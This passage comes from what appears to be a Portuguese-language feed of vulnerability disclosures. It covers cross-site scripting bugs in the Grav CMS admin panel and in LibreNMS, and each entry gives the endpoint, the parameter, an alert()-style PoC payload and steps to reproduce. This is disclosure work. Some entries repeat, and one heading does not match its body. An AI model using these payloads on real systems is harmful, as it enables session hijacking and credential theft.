<li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-66309/ https://www.cvehunters.com/pt/p/cve-2025-66309/ <h2 id="cve-2025-66309-cross-site-scripting-xss-refletido-no-endpoint-adminpagespage-parâmetro-dataheadercontentitems-localizado-na-aba-configuração-do-blog">CVE-2025-66309: Cross-Site Scripting (XSS) refletido no endpoint <code>/admin/pages/[page]</code>, parâmetro <code>data[header][content][items]</code>, localizado na aba “Configuração do Blog” </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66309" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66309</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido foi identificada no endpoint <code>/admin/pages/[page]</code> do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>data[header][content][items]</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>GET /admin/pages/[page]</code></p> <p>Parâmetro: <code>data[header][content][items]</code></p> <p style="text-align: justify;">O aplicativo não valida e sanitiza corretamente a entrada do usuário no parâmetro <code>data[header][content][items]</code>. Como resultado, atacantes podem criar uma URL maliciosa com um payload XSS. Quando este URL é acessado, o script injetado é refletido na resposta HTTP e executado no contexto da sessão do navegador da vítima.</p><h2 id="cve-2025-66309-cross-site-scripting-xss-refletido-no-endpoint-adminpagespage-parâmetro-dataheadercontentitems-localizado-na-aba-configuração-do-blog">CVE-2025-66309: Cross-Site Scripting (XSS) refletido no endpoint <code>/admin/pages/[page]</code>, parâmetro <code>data[header][content][items]</code>, localizado na aba “Configuração do Blog” </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66309" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66309</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido foi identificada no endpoint <code>/admin/pages/[page]</code> do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>data[header][content][items]</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>GET /admin/pages/[page]</code></p> <p>Parâmetro: <code>data[header][content][items]</code></p> <p style="text-align: justify;">O aplicativo não valida e sanitiza corretamente a entrada do usuário no parâmetro <code>data[header][content][items]</code>. Como resultado, atacantes podem criar uma URL maliciosa com um payload XSS. Quando este URL é acessado, o script injetado é refletido na resposta HTTP e executado no contexto da sessão do navegador da vítima.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">ImG</span> <span class="na">sRc</span><span class="o">=</span><span class="s">x</span> <span class="na">OnErRoR</span><span class="o">=</span><span class="s">alert('XSS-PoC3')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"> <ul> <li>Faça login no Painel de Administração do Grav e navegue até <b>Páginas</b>.</li> <li>Crie uma nova página ou edite uma existente.</li> <li>No campo <b>Avançado > Configuração do Blog > Itens</b> (que corresponde a <code>data[header][content][items]</code>), insira o payload acima.</li> </ul> </p> <p><img src="/p/cve-2025-66309/image.png" width="1910" height="510" srcset="/p/cve-2025-66309/image_hu_e1d1fb13d9a9b4e7.png 480w, /p/cve-2025-66309/image_hu_3a3afba466c81fbb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="374" data-flex-basis="898px" /></p> <p style="text-align: justify;"> <ul> <li>Salve a página.</li> <li>A carga maliciosa é refletida e renderizada pelo aplicativo sem a devida sanitização. O código JavaScript é executado imediatamente no navegador.</li> </ul> </p> <p><img src="/p/cve-2025-66309/image-1.png" width="991" height="534" srcset="/p/cve-2025-66309/image-1_hu_a0c6b4602ec1b3c4.png 480w, /p/cve-2025-66309/image-1_hu_db37a16e3222c488.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="445px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-66310/ https://www.cvehunters.com/pt/p/cve-2025-66310/ <h2 id="cve-2025-66310-cross-site-scripting-xss-armazenado-no-parêmetro-dataheadertemplate-do-endpoint-adminpagespage-na-guia-avançado">CVE-2025-66310: Cross-Site Scripting (XSS) Armazenado no Parêmetro <code>data[header][template]</code> do Endpoint <code>/admin/pages/[page]</code> na guia Avançado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66310" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66310</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>/admin/pages/[page]</code> do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>data[header][template]</code>. O script é salvo no frontmatter da página e executado automaticamente sempre que o conteúdo afetado é renderizado na interface administrativa ou na visualização do frontend.</p><h2 id="cve-2025-66310-cross-site-scripting-xss-armazenado-no-parêmetro-dataheadertemplate-do-endpoint-adminpagespage-na-guia-avançado">CVE-2025-66310: Cross-Site Scripting (XSS) Armazenado no Parêmetro <code>data[header][template]</code> do Endpoint <code>/admin/pages/[page]</code> na guia Avançado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66310" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66310</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>/admin/pages/[page]</code> do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>data[header][template]</code>. O script é salvo no frontmatter da página e executado automaticamente sempre que o conteúdo afetado é renderizado na interface administrativa ou na visualização do frontend.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>POST /admin/pages/[page]</code></p> <p>Parâmetro: <code>data[header][template]</code></p> <p style="text-align: justify;">O aplicativo não consegue sanitizar corretamente a entrada do usuário no campo <code>data[header][template]</code>, que está armazenado no frontmatter YAML da página. Um invasor pode injetar código JavaScript usando este campo, e o payload é renderizado e executado quando a página é acessada, especialmente na interface do Painel de Administração.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"><script>alert('PoC-XXS73')</script> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir: </h3><p style="text-align: justify;"> <ul> <li>Faça login no Painel de Administração do Grav e navegue até <b>Páginas</b>.</li> <li>Crie uma nova página ou edite uma existente.</li> <li>No campo <b>Modelo Avançado</b> (que corresponde a <code>data[header][template]</code>), insira o seguinte:</li> </ul> </p> <p><img src="/p/cve-2025-66310/image.png" width="1910" height="695" srcset="/p/cve-2025-66310/image_hu_8bfe0d4dea5df50c.png 480w, /p/cve-2025-66310/image_hu_98b89a8f489219fc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="274" data-flex-basis="659px" /></p> <p style="text-align: justify;"> <ul> <li>Salve a página.</li> <li>Retorne à seção <b>Páginas</b> e clique no <b>menu de três pontos</b> da página afetada:</li> </ul> </p> <p><img src="/p/cve-2025-66310/image-1.png" width="819" height="625" srcset="/p/cve-2025-66310/image-1_hu_910ecbc70fceca54.png 480w, /p/cve-2025-66310/image-1_hu_642c42209238d437.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="131" data-flex-basis="314px" /></p> <p style="text-align: justificar;"> <ul> <li>O payload XSS armazenado é acionado e o script é executado no navegador:</li> </ul> </p> <p><img src="/p/cve-2025-66310/image-2.png" width="753" height="466" srcset="/p/cve-2025-66310/image-2_hu_9b23293ebfc30995.png 480w, /p/cve-2025-66310/image-2_hu_ad614adf733a9c65.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="161" data-flex-basis="387px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-66311/ https://www.cvehunters.com/pt/p/cve-2025-66311/ <h2 id="cve-2025-66311-cross-site-scripting-xss-armazenado-no-endpoint-adminpagespage-em-múltiplos-parâmetros">CVE-2025-66311: Cross-Site Scripting (XSS) Armazenado no Endpoint <code>/admin/pages/[page]</code> em Múltiplos Parâmetros </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66311" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66311</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Foi identificada uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada em múltiplos endpoints: <code>/admin/pages/[page]</code> do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos nos parâmetros <code>data[header][metadata]</code>, <code>data[header][taxonomy][category]</code> e <code>data[header][taxonomy][tag]</code>. Esses scripts são armazenados no frontmatter da página e executados automaticamente sempre que a página afetada é acessada ou renderizada na interface administrativa.</p><h2 id="cve-2025-66311-cross-site-scripting-xss-armazenado-no-endpoint-adminpagespage-em-múltiplos-parâmetros">CVE-2025-66311: Cross-Site Scripting (XSS) Armazenado no Endpoint <code>/admin/pages/[page]</code> em Múltiplos Parâmetros </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66311" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66311</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Foi identificada uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada em múltiplos endpoints: <code>/admin/pages/[page]</code> do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos nos parâmetros <code>data[header][metadata]</code>, <code>data[header][taxonomy][category]</code> e <code>data[header][taxonomy][tag]</code>. Esses scripts são armazenados no frontmatter da página e executados automaticamente sempre que a página afetada é acessada ou renderizada na interface administrativa.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /admin/pages/[page]</code></p> <p>Parâmetros: <code>data[header][metadata]</code>, <code>data[header][taxonomy][category]</code> and <code>data[header][taxonomy][tag]</code></p> <p style="text-align: justify;">O aplicativo não consegue higienizar corretamente a entrada do usuário ao salvar metadados da página ou campos de taxonomia por meio do Painel de Administração. Como resultado, um invasor com acesso à interface administrativa pode injetar um script malicioso usando esses parâmetros, e o script será armazenado no frontmatter YAML da página. Quando a página ou os metadados são renderizados (especialmente no Painel de Administração), o payload é executado no navegador de qualquer usuário com acesso.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS51'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para Reproduzir: </h3><p style="text-align: justify;"> <ul> <li>Faça login no Painel de Administração do Grav e navegue até <b>Páginas</b>.</li> <li>Crie ou edite uma página.</li> <li>Insira o código acima em qualquer um dos seguintes campos na aba Opções: <b>Nome da chave de Metadados</b>; <b>Categoria</b> em Taxonomia; <b>Tag</b> em Taxonomia:</li> </ul> </p> <p><img src="/p/cve-2025-66311/image.png" width="1889" height="772" srcset="/p/cve-2025-66311/image_hu_129d0e4604e7b1d0.png 480w, /p/cve-2025-66311/image_hu_380b4f06d4f89362.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="244" data-flex-basis="587px" /></p> <p><img src="/p/cve-2025-66311/image-1.png" width="848" height="680" srcset="/p/cve-2025-66311/image-1_hu_cc5fbfca26033db6.png 480w, /p/cve-2025-66311/image-1_hu_84c2ecb12a0e25dd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="124" data-flex-basis="299px" /></p> <p style="text-align: justify;"> <ul> <li>Salve a página.</li> </ul> </p> <p><img src="/p/cve-2025-66311/image-2.png" width="1093" height="559" srcset="/p/cve-2025-66311/image-2_hu_9166270826c0da33.png 480w, /p/cve-2025-66311/image-2_hu_25d09907adc2064.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="195" data-flex-basis="469px" /></p> <p style="text-align: justify;">Quando a página é carregada novamente no Painel de Administração ou, potencialmente, no frontend (dependendo de como os metadados são usados), o script é executado, confirmando a vulnerabilidade de XSS armazenado.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-66312/ https://www.cvehunters.com/pt/p/cve-2025-66312/ <h2 id="cve-2025-66312-cross-site-scripting-xss-armazenado-no-parêmetro-dataheadertemplate-do-endpoint-adminpagespage-na-guia-avançado">CVE-2025-66312: Cross-Site Scripting (XSS) Armazenado no Parêmetro <code>data[header][template]</code> do Endpoint <code>/admin/pages/[page]</code> na guia Avançado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66312" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66312</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>/admin/accounts/groups/Grupo</code> do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>data[readableName]</code>. O script é salvo no frontmatter da página e executado automaticamente sempre que o conteúdo afetado é renderizado na interface administrativa ou na visualização do frontend.</p><h2 id="cve-2025-66312-cross-site-scripting-xss-armazenado-no-parêmetro-dataheadertemplate-do-endpoint-adminpagespage-na-guia-avançado">CVE-2025-66312: Cross-Site Scripting (XSS) Armazenado no Parêmetro <code>data[header][template]</code> do Endpoint <code>/admin/pages/[page]</code> na guia Avançado </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66312" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66312</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint <code>/admin/accounts/groups/Grupo</code> do aplicativo Grav. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro <code>data[readableName]</code>. O script é salvo no frontmatter da página e executado automaticamente sempre que o conteúdo afetado é renderizado na interface administrativa ou na visualização do frontend.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>POST /admin/accounts/groups/Grupo</code></p> <p>Parâmetro: <code>data[readableName]</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"><ScRipT>alert('PoC-XSS')</ScRipT> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passos-para-reproduzir">Passos para reproduzir: </h3><p style="text-align: justify;"> <ul> <li>Navegue até <b>Contas > Grupos</b> no painel administrativo.</li> <li>Crie um novo grupo ou edite um existente.</li> <li>No campo <b>Nome de Exibição</b> (que corresponde a <code>data[readableName]</code>), insira o payload acima e salve as alterações.</li> </ul> </p> <p><img src="/p/cve-2025-66312/image.png" width="1309" height="549" srcset="/p/cve-2025-66312/image_hu_56c71e0062372f4f.png 480w, /p/cve-2025-66312/image_hu_765f3adc436b0b52.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="572px" /></p> <p style="text-align: justify;"> <ul> <li>A seguinte solicitação HTTP foi gerada durante esta ação:</li> </ul> </p> <p><img src="/p/cve-2025-66312/image-1.png" width="849" height="669" srcset="/p/cve-2025-66312/image-1_hu_635bb1670341f446.png 480w, /p/cve-2025-66312/image-1_hu_79252ce353d0bcdd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="126" data-flex-basis="304px" /></p> <p style="text-align: justify;"> <ul> <li>Em seguida, acesse <b>Contas > Usuários</b> e abra qualquer perfil de usuário.</li> </ul> </p> <p><img src="/p/cve-2025-66312/image-2.png" width="1307" height="560" srcset="/p/cve-2025-66312/image-2_hu_cc964237802c91e6.png 480w, /p/cve-2025-66312/image-2_hu_ea8f2a27d7b43b7f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="233" data-flex-basis="560px" /></p> <p style="text-align: justify;"> <ul> <li>O script malicioso é executado imediatamente no navegador quando a página carrega, confirmando a existência de uma vulnerabilidade XSS armazenada.</li> </ul> </p> <p><img src="/p/cve-2025-66312/image-3.png" width="945" height="446" srcset="/p/cve-2025-66312/image-3_hu_f451aa2b0f343379.png 480w, /p/cve-2025-66312/image-3_hu_82084485c0851189.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="211" data-flex-basis="508px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.</li> <li>Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.</li> <li>Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.</li> <li>Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.</li> <li>Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.</li> <li>Danos à reputação: Erosão da confiança entre usuários e administradores do site.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-65013/ https://www.cvehunters.com/pt/p/cve-2025-65013/ <h2 id="cve-2025-65013-cross-site-scripting-xss-refletido-no-endpoint-mapsnodeimage-parâmetro-image-name">CVE-2025-65013: Cross-Site Scripting (XSS) Refletido no endpoint <code>/maps/nodeimage</code> parâmetro <code>Image Name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65013" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65013</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>/maps/nodeimage</code> do aplicativo LibreNMS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Image Name</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/maps/nodeimage</code></p> <p>Parâmetro: <code>Image Name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Image Name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-65013-cross-site-scripting-xss-refletido-no-endpoint-mapsnodeimage-parâmetro-image-name">CVE-2025-65013: Cross-Site Scripting (XSS) Refletido no endpoint <code>/maps/nodeimage</code> parâmetro <code>Image Name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65013" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65013</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>/maps/nodeimage</code> do aplicativo LibreNMS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Image Name</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/maps/nodeimage</code></p> <p>Parâmetro: <code>Image Name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Image Name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS51'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-65013/image.png" width="713" height="589" srcset="/p/cve-2025-65013/image_hu_d47d134d7563c0b1.png 480w, /p/cve-2025-65013/image_hu_790aaa5d86f85434.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="121" data-flex-basis="290px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x" target="_blank" rel="noopener" >https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> 